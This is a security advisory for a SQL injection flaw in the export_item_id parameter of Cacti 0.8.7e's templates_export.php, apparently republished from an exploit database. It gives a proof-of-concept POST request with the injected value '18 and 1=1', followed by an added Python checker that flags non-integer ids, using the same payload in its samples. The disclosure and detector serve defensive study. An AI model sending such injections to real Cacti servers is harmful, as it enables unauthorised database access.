Cacti 0.8.7e – SQL Injection

  • Author: Nahuel Grisolia
    Date: 2010-04-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12338/
  • CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
    A vulnerability has been discovered in Cacti that any user can exploit to
    conduct SQL injection attacks.
    Input passed via the “export_item_id” parameter to the “templates_export.php”
    script is not properly sanitized before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL
    code.
    The following is a proof-of-concept POST request:
    POST /cacti-0.8.7e/templates_export.php HTTP/1.1
    Host: 192.168.1.107
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Proxy-Connection: keep-alive
    Referer: http://192.168.1.107/cacti-0.8.7e/templates_export.php
    Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 130

    export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
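
A defensive check for the request shown above, as an added example that is not part of the original advisory or of Cacti's code: it parses a captured request to templates_export.php and flags any export_item_id value that is not a plain integer. The sample requests, the host cacti.example, the /cacti/ path prefix and the 10-digit id limit are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

TARGET_SCRIPT = "templates_export.php"   # script named in the advisory
TARGET_PARAM = "export_item_id"          # parameter named in the advisory
INTEGER_ID = re.compile(r"[0-9]{1,10}")  # assumption: ids are short positive integers


def split_request(raw):
    """Return (path, body) from a raw HTTP/1.x request; ("", "") if malformed."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) != 3:
        return "", ""
    return urlsplit(parts[1]).path, body.strip()


def audit_export_request(raw):
    """Return a list of findings for one request; an empty list means clean."""
    path, body = split_request(raw)
    if not path.endswith("/" + TARGET_SCRIPT):
        return []
    findings = []
    # parse_qs URL-decodes values, so plain and percent-encoded forms are judged alike.
    values = parse_qs(body, keep_blank_values=True).get(TARGET_PARAM, [])
    if len(values) > 1:
        findings.append("duplicate %s parameter" % TARGET_PARAM)
    for value in values:
        if not INTEGER_ID.fullmatch(value):
            findings.append("non-integer %s: %r" % (TARGET_PARAM, value))
    return findings


def build_request(body):
    # Constructed sample request; host and path prefix are placeholders.
    return ("POST /cacti/templates_export.php HTTP/1.1\r\n"
            "Host: cacti.example\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n%s" % (len(body), body))


TAIL = "&include_deps=on&output_format=3&export_type=graph_template&action=save"
SAMPLES = {  # constructed inputs; "page_poc" reuses the value from the request above
    "benign": build_request("export_item_id=18" + TAIL),
    "page_poc": build_request("export_item_id=18 and 1=1" + TAIL),
    "encoded": build_request("export_item_id=18%20and%201%3D1" + TAIL),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, audit_export_request(raw))
```

The same allow-list rule (integer only) is what the server-side handler should enforce before the value reaches a query.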
    
    ===========================================================================
    Download:
    ===========================================================================
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf)
    
    
    <Bonsai Information Security Advisories>
    http://www.bonsai-sec.com/en/research/vulnerability.php